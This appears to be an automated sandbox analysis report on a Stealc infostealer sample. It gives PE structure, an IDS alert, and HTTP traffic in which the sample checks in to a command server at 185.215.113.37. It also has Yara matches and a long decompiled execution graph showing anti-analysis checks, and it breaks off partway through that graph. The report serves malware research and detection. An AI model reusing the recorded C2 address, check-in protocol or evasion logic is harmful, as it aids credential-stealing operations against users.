                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx], al
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add dword ptr [edx], ecx
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    and byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add cl, byte ptr [edx]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Rich Headers

                    Programming Language:
                    • [C++] VS2010 build 30319
                    • [ASM] VS2010 build 30319
                    • [ C ] VS2010 build 30319
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [LNK] VS2010 build 30319

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x25b0000x2280082dba94a54223d7fa0cc3857955d6be6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x25e0000x2a70000x200d3f96306eb4c4cc00f34072a728b82adunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    hxrvraam0x5050000x1a10000x1a0200b37624aef7c41b86e0d6c7bf32b13b7bFalse0.9949960339065785data7.954518542392513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    mezjsajj0x6a60000x10000x400adf8aec738b37f6337c21d1bc231e502False0.7333984375data5.819652837459116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x6a70000x30000x2200c5e4bc3dbaa72ba54702d4be62cec4dbFalse0.09099264705882353DOS executable (COM)1.0812336285801456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                    Imports

                    DLLImport
                    kernel32.dlllstrcpy

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-10-02T05:02:05.423757+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649710185.215.113.3780TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 2, 2024 05:02:04.503863096 CEST4971080192.168.2.6185.215.113.37
                    Oct 2, 2024 05:02:04.508725882 CEST8049710185.215.113.37192.168.2.6
                    Oct 2, 2024 05:02:04.508797884 CEST4971080192.168.2.6185.215.113.37
                    Oct 2, 2024 05:02:04.509346962 CEST4971080192.168.2.6185.215.113.37
                    Oct 2, 2024 05:02:04.514132977 CEST8049710185.215.113.37192.168.2.6
                    Oct 2, 2024 05:02:05.198018074 CEST8049710185.215.113.37192.168.2.6
                    Oct 2, 2024 05:02:05.198132038 CEST4971080192.168.2.6185.215.113.37
                    Oct 2, 2024 05:02:05.201461077 CEST4971080192.168.2.6185.215.113.37
                    Oct 2, 2024 05:02:05.206314087 CEST8049710185.215.113.37192.168.2.6
                    Oct 2, 2024 05:02:05.423692942 CEST8049710185.215.113.37192.168.2.6
                    Oct 2, 2024 05:02:05.423757076 CEST4971080192.168.2.6185.215.113.37
                    Oct 2, 2024 05:02:07.911515951 CEST4971080192.168.2.6185.215.113.37

                    HTTP Request Dependency Graph

                    • 185.215.113.37

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.649710185.215.113.37802748C:\Users\user\Desktop\file.exe
                    TimestampBytes transferredDirectionData
                    Oct 2, 2024 05:02:04.509346962 CEST89OUTGET / HTTP/1.1
                    Host: 185.215.113.37
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Oct 2, 2024 05:02:05.198018074 CEST203INHTTP/1.1 200 OK
                    Date: Wed, 02 Oct 2024 03:02:05 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Oct 2, 2024 05:02:05.201461077 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----AECFCAAECBGDGDHIEHJE
                    Host: 185.215.113.37
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 37 30 38 42 38 41 36 37 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 46 43 41 41 45 43 42 47 44 47 44 48 49 45 48 4a 45 2d 2d 0d 0a
                    Data Ascii: ------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="hwid"1A708B8A679D1524750037------AECFCAAECBGDGDHIEHJEContent-Disposition: form-data; name="build"doma------AECFCAAECBGDGDHIEHJE--
                    Oct 2, 2024 05:02:05.423692942 CEST210INHTTP/1.1 200 OK
                    Date: Wed, 02 Oct 2024 03:02:05 GMT
                    Server: Apache/2.4.52 (Ubuntu)
                    Content-Length: 8
                    Keep-Alive: timeout=5, max=99
                    Connection: Keep-Alive
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 59 6d 78 76 59 32 73 3d
                    Data Ascii: YmxvY2s=


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    System Behavior

                    General

                    Target ID:0
                    Start time:23:02:00
                    Start date:01/10/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x540000
                    File size:1'860'608 bytes
                    MD5 hash:2252EE92F584848EAC43445204FEC9A4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2174797423.0000000001028000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2174035967.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2133685233.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:8.1%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:9.7%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:24
                      execution_graph 13449 5569f0 13494 542260 13449->13494 13473 556a64 13474 55a9b0 4 API calls 13473->13474 13475 556a6b 13474->13475 13476 55a9b0 4 API calls 13475->13476 13477 556a72 13476->13477 13478 55a9b0 4 API calls 13477->13478 13479 556a79 13478->13479 13480 55a9b0 4 API calls 13479->13480 13481 556a80 13480->13481 13646 55a8a0 13481->13646 13483 556b0c 13650 556920 GetSystemTime 13483->13650 13485 556a89 13485->13483 13487 556ac2 OpenEventA 13485->13487 13489 556af5 CloseHandle Sleep 13487->13489 13490 556ad9 13487->13490 13491 556b0a 13489->13491 13493 556ae1 CreateEventA 13490->13493 13491->13485 13493->13483 13847 5445c0 13494->13847 13496 542274 13497 5445c0 2 API calls 13496->13497 13498 54228d 13497->13498 13499 5445c0 2 API calls 13498->13499 13500 5422a6 13499->13500 13501 5445c0 2 API calls 13500->13501 13502 5422bf 13501->13502 13503 5445c0 2 API calls 13502->13503 13504 5422d8 13503->13504 13505 5445c0 2 API calls 13504->13505 13506 5422f1 13505->13506 13507 5445c0 2 API calls 13506->13507 13508 54230a 13507->13508 13509 5445c0 2 API calls 13508->13509 13510 542323 13509->13510 13511 5445c0 2 API calls 13510->13511 13512 54233c 13511->13512 13513 5445c0 2 API calls 13512->13513 13514 542355 13513->13514 13515 5445c0 2 API calls 13514->13515 13516 54236e 13515->13516 13517 5445c0 2 API calls 13516->13517 13518 542387 13517->13518 13519 5445c0 2 API calls 13518->13519 13520 5423a0 13519->13520 13521 5445c0 2 API calls 13520->13521 13522 5423b9 13521->13522 13523 5445c0 2 API calls 13522->13523 13524 5423d2 13523->13524 13525 5445c0 2 API calls 13524->13525 13526 5423eb 13525->13526 13527 5445c0 2 API calls 13526->13527 13528 542404 13527->13528 13529 5445c0 2 API calls 13528->13529 13530 54241d 13529->13530 13531 5445c0 2 API calls 13530->13531 13532 542436 13531->13532 13533 5445c0 2 API calls 13532->13533 13534 54244f 13533->13534 13535 5445c0 2 API calls 13534->13535 13536 542468 13535->13536 13537 5445c0 2 API calls 13536->13537 13538 542481 13537->13538 13539 5445c0 2 API calls 13538->13539 13540 54249a 13539->13540 13541 5445c0 2 API calls 13540->13541 13542 5424b3 13541->13542 13543 5445c0 2 API calls 13542->13543 13544 5424cc 13543->13544 13545 5445c0 2 API calls 13544->13545 13546 5424e5 13545->13546 13547 5445c0 2 API calls 13546->13547 13548 5424fe 13547->13548 13549 5445c0 2 API calls 13548->13549 13550 542517 13549->13550 13551 5445c0 2 API calls 13550->13551 13552 542530 13551->13552 13553 5445c0 2 API calls 13552->13553 13554 542549 13553->13554 13555 5445c0 2 API calls 13554->13555 13556 542562 13555->13556 13557 5445c0 2 API calls 13556->13557 13558 54257b 13557->13558 13559 5445c0 2 API calls 13558->13559 13560 542594 13559->13560 13561 5445c0 2 API calls 13560->13561 13562 5425ad 13561->13562 13563 5445c0 2 API calls 13562->13563 13564 5425c6 13563->13564 13565 5445c0 2 API calls 13564->13565 13566 5425df 13565->13566 13567 5445c0 2 API calls 13566->13567 13568 5425f8 13567->13568 13569 5445c0 2 API calls 13568->13569 13570 542611 13569->13570 13571 5445c0 2 API calls 13570->13571 13572 54262a 13571->13572 13573 5445c0 2 API calls 13572->13573 13574 542643 13573->13574 13575 5445c0 2 API calls 13574->13575 13576 54265c 13575->13576 13577 5445c0 2 API calls 13576->13577 13578 542675 13577->13578 13579 5445c0 2 API calls 13578->13579 13580 54268e 13579->13580 13581 559860 13580->13581 13852 559750 GetPEB 13581->13852 13583 559868 13584 559a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13583->13584 13585 55987a 13583->13585 13586 559af4 GetProcAddress 13584->13586 13587 559b0d 13584->13587 13588 55988c 21 API calls 13585->13588 13586->13587 13589 559b46 13587->13589 13590 559b16 GetProcAddress GetProcAddress 13587->13590 13588->13584 13591 559b4f GetProcAddress 13589->13591 13592 559b68 13589->13592 13590->13589 13591->13592 13593 559b71 GetProcAddress 13592->13593 13594 559b89 13592->13594 13593->13594 13595 556a00 13594->13595 13596 559b92 GetProcAddress GetProcAddress 13594->13596 13597 55a740 13595->13597 13596->13595 13598 55a750 13597->13598 13599 556a0d 13598->13599 13600 55a77e lstrcpy 13598->13600 13601 5411d0 13599->13601 13600->13599 13602 5411e8 13601->13602 13603 541217 13602->13603 13604 54120f ExitProcess 13602->13604 13605 541160 GetSystemInfo 13603->13605 13606 541184 13605->13606 13607 54117c ExitProcess 13605->13607 13608 541110 GetCurrentProcess VirtualAllocExNuma 13606->13608 13609 541141 ExitProcess 13608->13609 13610 541149 13608->13610 13853 5410a0 VirtualAlloc 13610->13853 13613 541220 13857 5589b0 13613->13857 13616 541249 13617 54129a 13616->13617 13618 541292 ExitProcess 13616->13618 13619 556770 GetUserDefaultLangID 13617->13619 13620 5567d3 13619->13620 13621 556792 13619->13621 13627 541190 13620->13627 13621->13620 13622 5567b7 ExitProcess 13621->13622 13623 5567c1 ExitProcess 13621->13623 13624 5567a3 ExitProcess 13621->13624 13625 5567ad ExitProcess 13621->13625 13626 5567cb ExitProcess 13621->13626 13628 5578e0 3 API calls 13627->13628 13630 54119e 13628->13630 13629 5411cc 13634 557850 GetProcessHeap RtlAllocateHeap GetUserNameA 13629->13634 13630->13629 13631 557850 3 API calls 13630->13631 13632 5411b7 13631->13632 13632->13629 13633 5411c4 ExitProcess 13632->13633 13635 556a30 13634->13635 13636 5578e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13635->13636 13637 556a43 13636->13637 13638 55a9b0 13637->13638 13859 55a710 13638->13859 13640 55a9c1 lstrlen 13642 55a9e0 13640->13642 13641 55aa18 13860 55a7a0 13641->13860 13642->13641 13644 55a9fa lstrcpy lstrcat 13642->13644 13644->13641 13645 55aa24 13645->13473 13647 55a8bb 13646->13647 13648 55a90b 13647->13648 13649 55a8f9 lstrcpy 13647->13649 13648->13485 13649->13648 13864 556820 13650->13864 13652 55698e 13653 556998 sscanf 13652->13653 13893 55a800 13653->13893 13655 5569aa SystemTimeToFileTime SystemTimeToFileTime 13656 5569e0 13655->13656 13657 5569ce 13655->13657 13659 555b10 13656->13659 13657->13656 13658 5569d8 ExitProcess 13657->13658 13660 555b1d 13659->13660 13661 55a740 lstrcpy 13660->13661 13662 555b2e 13661->13662 13895 55a820 lstrlen 13662->13895 13665 55a820 2 API calls 13666 555b64 13665->13666 13667 55a820 2 API calls 13666->13667 13668 555b74 13667->13668 13899 556430 13668->13899 13671 55a820 2 API calls 13672 555b93 13671->13672 13673 55a820 2 API calls 13672->13673 13674 555ba0 13673->13674 13675 55a820 2 API calls 13674->13675 13676 555bad 13675->13676 13677 55a820 2 API calls 13676->13677 13678 555bf9 13677->13678 13908 5426a0 13678->13908 13686 555cc3 13687 556430 lstrcpy 13686->13687 13688 555cd5 13687->13688 13689 55a7a0 lstrcpy 13688->13689 13690 555cf2 13689->13690 13691 55a9b0 4 API calls 13690->13691 13692 555d0a 13691->13692 13693 55a8a0 lstrcpy 13692->13693 13694 555d16 13693->13694 13695 55a9b0 4 API calls 13694->13695 13696 555d3a 13695->13696 13697 55a8a0 lstrcpy 13696->13697 13698 555d46 13697->13698 13699 55a9b0 4 API calls 13698->13699 13700 555d6a 13699->13700 13701 55a8a0 lstrcpy 13700->13701 13702 555d76 13701->13702 13703 55a740 lstrcpy 13702->13703 13704 555d9e 13703->13704 14634 557500 GetWindowsDirectoryA 13704->14634 13707 55a7a0 lstrcpy 13708 555db8 13707->13708 14644 544880 13708->14644 13710 555dbe 14789 5517a0 13710->14789 13712 555dc6 13713 55a740 lstrcpy 13712->13713 13714 555de9 13713->13714 13715 541590 lstrcpy 13714->13715 13716 555dfd 13715->13716 14805 545960 13716->14805 13718 555e03 14949 551050 13718->14949 13720 555e0e 13721 55a740 lstrcpy 13720->13721 13722 555e32 13721->13722 13723 541590 lstrcpy 13722->13723 13724 555e46 13723->13724 13725 545960 34 API calls 13724->13725 13726 555e4c 13725->13726 14953 550d90 13726->14953 13728 555e57 13729 55a740 lstrcpy 13728->13729 13730 555e79 13729->13730 13731 541590 lstrcpy 13730->13731 13732 555e8d 13731->13732 13733 545960 34 API calls 13732->13733 13734 555e93 13733->13734 14960 550f40 13734->14960 13736 555e9e 13737 541590 lstrcpy 13736->13737 13738 555eb5 13737->13738 14965 551a10 13738->14965 13740 555eba 13741 55a740 lstrcpy 13740->13741 13742 555ed6 13741->13742 15309 544fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13742->15309 13744 555edb 13745 541590 lstrcpy 13744->13745 13746 555f5b 13745->13746 15316 550740 13746->15316 13748 555f60 13749 55a740 lstrcpy 13748->13749 13750 555f86 13749->13750 13751 541590 lstrcpy 13750->13751 13752 555f9a 13751->13752 13753 545960 34 API calls 13752->13753 13754 555fa0 13753->13754 13848 5445d1 RtlAllocateHeap 13847->13848 13850 544621 VirtualProtect 13848->13850 13850->13496 13852->13583 13854 5410c2 ctype 13853->13854 13855 5410fd 13854->13855 13856 5410e2 VirtualFree 13854->13856 13855->13613 13856->13855 13858 541233 GlobalMemoryStatusEx 13857->13858 13858->13616 13859->13640 13861 55a7c2 13860->13861 13862 55a7ec 13861->13862 13863 55a7da lstrcpy 13861->13863 13862->13645 13863->13862 13865 55a740 lstrcpy 13864->13865 13866 556833 13865->13866 13867 55a9b0 4 API calls 13866->13867 13868 556845 13867->13868 13869 55a8a0 lstrcpy 13868->13869 13870 55684e 13869->13870 13871 55a9b0 4 API calls 13870->13871 13872 556867 13871->13872 13873 55a8a0 lstrcpy 13872->13873 13874 556870 13873->13874 13875 55a9b0 4 API calls 13874->13875 13876 55688a 13875->13876 13877 55a8a0 lstrcpy 13876->13877 13878 556893 13877->13878 13879 55a9b0 4 API calls 13878->13879 13880 5568ac 13879->13880 13881 55a8a0 lstrcpy 13880->13881 13882 5568b5 13881->13882 13883 55a9b0 4 API calls 13882->13883 13884 5568cf 13883->13884 13885 55a8a0 lstrcpy 13884->13885 13886 5568d8 13885->13886 13887 55a9b0 4 API calls 13886->13887 13888 5568f3 13887->13888 13889 55a8a0 lstrcpy 13888->13889 13890 5568fc 13889->13890 13891 55a7a0 lstrcpy 13890->13891 13892 556910 13891->13892 13892->13652 13894 55a812 13893->13894 13894->13655 13896 55a83f 13895->13896 13897 555b54 13896->13897 13898 55a87b lstrcpy 13896->13898 13897->13665 13898->13897 13900 55a8a0 lstrcpy 13899->13900 13901 556443 13900->13901 13902 55a8a0 lstrcpy 13901->13902 13903 556455 13902->13903 13904 55a8a0 lstrcpy 13903->13904 13905 556467 13904->13905 13906 55a8a0 lstrcpy 13905->13906 13907 555b86 13906->13907 13907->13671 13909 5445c0 2 API calls 13908->13909 13910 5426b4 13909->13910 13911 5445c0 2 API calls 13910->13911 13912 5426d7 13911->13912 13913 5445c0 2 API calls 13912->13913 13914 5426f0 13913->13914 13915 5445c0 2 API calls 13914->13915 13916 542709 13915->13916 13917 5445c0 2 API calls 13916->13917 13918 542736 13917->13918 13919 5445c0 2 API calls 13918->13919 13920 54274f 13919->13920 13921 5445c0 2 API calls 13920->13921 13922 542768 13921->13922 13923 5445c0 2 API calls 13922->13923 13924 542795 13923->13924 13925 5445c0 2 API calls 13924->13925 13926 5427ae 13925->13926 13927 5445c0 2 API calls 13926->13927 13928 5427c7 13927->13928 13929 5445c0 2 API calls 13928->13929 13930 5427e0 13929->13930 13931 5445c0 2 API calls 13930->13931 13932 5427f9 13931->13932 13933 5445c0 2 API calls 13932->13933 13934 542812 13933->13934 13935 5445c0 2 API calls 13934->13935 13936 54282b 13935->13936 13937 5445c0 2 API calls 13936->13937 13938 542844 13937->13938 13939 5445c0 2 API calls 13938->13939 13940 54285d 13939->13940 13941 5445c0 2 API calls 13940->13941 13942 542876 13941->13942 13943 5445c0 2 API calls 13942->13943 13944 54288f 13943->13944 13945 5445c0 2 API calls 13944->13945 13946 5428a8 13945->13946 13947 5445c0 2 API calls 13946->13947 13948 5428c1 13947->13948 13949 5445c0 2 API calls 13948->13949 13950 5428da 13949->13950 13951 5445c0 2 API calls 13950->13951 13952 5428f3 13951->13952 13953 5445c0 2 API calls 13952->13953 13954 54290c 13953->13954 13955 5445c0 2 API calls 13954->13955 13956 542925 13955->13956 13957 5445c0 2 API calls 13956->13957 13958 54293e 13957->13958 13959 5445c0 2 API calls 13958->13959 13960 542957 13959->13960 13961 5445c0 2 API calls 13960->13961 13962 542970 13961->13962 13963 5445c0 2 API calls 13962->13963 13964 542989 13963->13964 13965 5445c0 2 API calls 13964->13965 13966 5429a2 13965->13966 13967 5445c0 2 API calls 13966->13967 13968 5429bb 13967->13968 13969 5445c0 2 API calls 13968->13969 13970 5429d4 13969->13970 13971 5445c0 2 API calls 13970->13971 13972 5429ed 13971->13972 13973 5445c0 2 API calls 13972->13973 13974 542a06 13973->13974 13975 5445c0 2 API calls 13974->13975 13976 542a1f 13975->13976 13977 5445c0 2 API calls 13976->13977 13978 542a38 13977->13978 13979 5445c0 2 API calls 13978->13979 13980 542a51 13979->13980 13981 5445c0 2 API calls 13980->13981 13982 542a6a 13981->13982 13983 5445c0 2 API calls 13982->13983 13984 542a83 13983->13984 13985 5445c0 2 API calls 13984->13985 13986 542a9c 13985->13986 13987 5445c0 2 API calls 13986->13987 13988 542ab5 13987->13988 13989 5445c0 2 API calls 13988->13989 13990 542ace 13989->13990 13991 5445c0 2 API calls 13990->13991 13992 542ae7 13991->13992 13993 5445c0 2 API calls 13992->13993 13994 542b00 13993->13994 13995 5445c0 2 API calls 13994->13995 13996 542b19 13995->13996 13997 5445c0 2 API calls 13996->13997 13998 542b32 13997->13998 13999 5445c0 2 API calls 13998->13999 14000 542b4b 13999->14000 14001 5445c0 2 API calls 14000->14001 14002 542b64 14001->14002 14003 5445c0 2 API calls 14002->14003 14004 542b7d 14003->14004 14005 5445c0 2 API calls 14004->14005 14006 542b96 14005->14006 14007 5445c0 2 API calls 14006->14007 14008 542baf 14007->14008 14009 5445c0 2 API calls 14008->14009 14010 542bc8 14009->14010 14011 5445c0 2 API calls 14010->14011 14012 542be1 14011->14012 14013 5445c0 2 API calls 14012->14013 14014 542bfa 14013->14014 14015 5445c0 2 API calls 14014->14015 14016 542c13 14015->14016 14017 5445c0 2 API calls 14016->14017 14018 542c2c 14017->14018 14019 5445c0 2 API calls 14018->14019 14020 542c45 14019->14020 14021 5445c0 2 API calls 14020->14021 14022 542c5e 14021->14022 14023 5445c0 2 API calls 14022->14023 14024 542c77 14023->14024 14025 5445c0 2 API calls 14024->14025 14026 542c90 14025->14026 14027 5445c0 2 API calls 14026->14027 14028 542ca9 14027->14028 14029 5445c0 2 API calls 14028->14029 14030 542cc2 14029->14030 14031 5445c0 2 API calls 14030->14031 14032 542cdb 14031->14032 14033 5445c0 2 API calls 14032->14033 14034 542cf4 14033->14034 14035 5445c0 2 API calls 14034->14035 14036 542d0d 14035->14036 14037 5445c0 2 API calls 14036->14037 14038 542d26 14037->14038 14039 5445c0 2 API calls 14038->14039 14040 542d3f 14039->14040 14041 5445c0 2 API calls 14040->14041 14042 542d58 14041->14042 14043 5445c0 2 API calls 14042->14043 14044 542d71 14043->14044 14045 5445c0 2 API calls 14044->14045 14046 542d8a 14045->14046 14047 5445c0 2 API calls 14046->14047 14048 542da3 14047->14048 14049 5445c0 2 API calls 14048->14049 14050 542dbc 14049->14050 14051 5445c0 2 API calls 14050->14051 14052 542dd5 14051->14052 14053 5445c0 2 API calls 14052->14053 14054 542dee 14053->14054 14055 5445c0 2 API calls 14054->14055 14056 542e07 14055->14056 14057 5445c0 2 API calls 14056->14057 14058 542e20 14057->14058 14059 5445c0 2 API calls 14058->14059 14060 542e39 14059->14060 14061 5445c0 2 API calls 14060->14061 14062 542e52 14061->14062 14063 5445c0 2 API calls 14062->14063 14064 542e6b 14063->14064 14065 5445c0 2 API calls 14064->14065 14066 542e84 14065->14066 14067 5445c0 2 API calls 14066->14067 14068 542e9d 14067->14068 14069 5445c0 2 API calls 14068->14069 14070 542eb6 14069->14070 14071 5445c0 2 API calls 14070->14071 14072 542ecf 14071->14072 14073 5445c0 2 API calls 14072->14073 14074 542ee8 14073->14074 14075 5445c0 2 API calls 14074->14075 14076 542f01 14075->14076 14077 5445c0 2 API calls 14076->14077 14078 542f1a 14077->14078 14079 5445c0 2 API calls 14078->14079 14080 542f33 14079->14080 14081 5445c0 2 API calls 14080->14081 14082 542f4c 14081->14082 14083 5445c0 2 API calls 14082->14083 14084 542f65 14083->14084 14085 5445c0 2 API calls 14084->14085 14086 542f7e 14085->14086 14087 5445c0 2 API calls 14086->14087 14088 542f97 14087->14088 14089 5445c0 2 API calls 14088->14089 14090 542fb0 14089->14090 14091 5445c0 2 API calls 14090->14091 14092 542fc9 14091->14092 14093 5445c0 2 API calls 14092->14093 14094 542fe2 14093->14094 14095 5445c0 2 API calls 14094->14095 14096 542ffb 14095->14096 14097 5445c0 2 API calls 14096->14097 14098 543014 14097->14098 14099 5445c0 2 API calls 14098->14099 14100 54302d 14099->14100 14101 5445c0 2 API calls 14100->14101 14102 543046 14101->14102 14103 5445c0 2 API calls 14102->14103 14104 54305f 14103->14104 14105 5445c0 2 API calls 14104->14105 14106 543078 14105->14106 14107 5445c0 2 API calls 14106->14107 14108 543091 14107->14108 14109 5445c0 2 API calls 14108->14109 14110 5430aa 14109->14110 14111 5445c0 2 API calls 14110->14111 14112 5430c3 14111->14112 14113 5445c0 2 API calls 14112->14113 14114 5430dc 14113->14114 14115 5445c0 2 API calls 14114->14115 14116 5430f5 14115->14116 14117 5445c0 2 API calls 14116->14117 14118 54310e 14117->14118 14119 5445c0 2 API calls 14118->14119 14120 543127 14119->14120 14121 5445c0 2 API calls 14120->14121 14122 543140 14121->14122 14123 5445c0 2 API calls 14122->14123 14124 543159 14123->14124 14125 5445c0 2 API calls 14124->14125 14126 543172 14125->14126 14127 5445c0 2 API calls 14126->14127 14128 54318b 14127->14128 14129 5445c0 2 API calls 14128->14129 14130 5431a4 14129->14130 14131 5445c0 2 API calls 14130->14131 14132 5431bd 14131->14132 14133 5445c0 2 API calls 14132->14133 14134 5431d6 14133->14134 14135 5445c0 2 API calls 14134->14135 14136 5431ef 14135->14136 14137 5445c0 2 API calls 14136->14137 14138 543208 14137->14138 14139 5445c0 2 API calls 14138->14139 14140 543221 14139->14140 14141 5445c0 2 API calls 14140->14141 14142 54323a 14141->14142 14143 5445c0 2 API calls 14142->14143 14144 543253 14143->14144 14145 5445c0 2 API calls 14144->14145 14146 54326c 14145->14146 14147 5445c0 2 API calls 14146->14147 14148 543285 14147->14148 14149 5445c0 2 API calls 14148->14149 14150 54329e 14149->14150 14151 5445c0 2 API calls 14150->14151 14152 5432b7 14151->14152 14153 5445c0 2 API calls 14152->14153 14154 5432d0 14153->14154 14155 5445c0 2 API calls 14154->14155 14156 5432e9 14155->14156 14157 5445c0 2 API calls 14156->14157 14158 543302 14157->14158 14159 5445c0 2 API calls 14158->14159 14160 54331b 14159->14160 14161 5445c0 2 API calls 14160->14161 14162 543334 14161->14162 14163 5445c0 2 API calls 14162->14163 14164 54334d 14163->14164 14165 5445c0 2 API calls 14164->14165 14166 543366 14165->14166 14167 5445c0 2 API calls 14166->14167 14168 54337f 14167->14168 14169 5445c0 2 API calls 14168->14169 14170 543398 14169->14170 14171 5445c0 2 API calls 14170->14171 14172 5433b1 14171->14172 14173 5445c0 2 API calls 14172->14173 14174 5433ca 14173->14174 14175 5445c0 2 API calls 14174->14175 14176 5433e3 14175->14176 14177 5445c0 2 API calls 14176->14177 14178 5433fc 14177->14178 14179 5445c0 2 API calls 14178->14179 14180 543415 14179->14180 14181 5445c0 2 API calls 14180->14181 14182 54342e 14181->14182 14183 5445c0 2 API calls 14182->14183 14184 543447 14183->14184 14185 5445c0 2 API calls 14184->14185 14186 543460 14185->14186 14187 5445c0 2 API calls 14186->14187 14188 543479 14187->14188 14189 5445c0 2 API calls 14188->14189 14190 543492 14189->14190 14191 5445c0 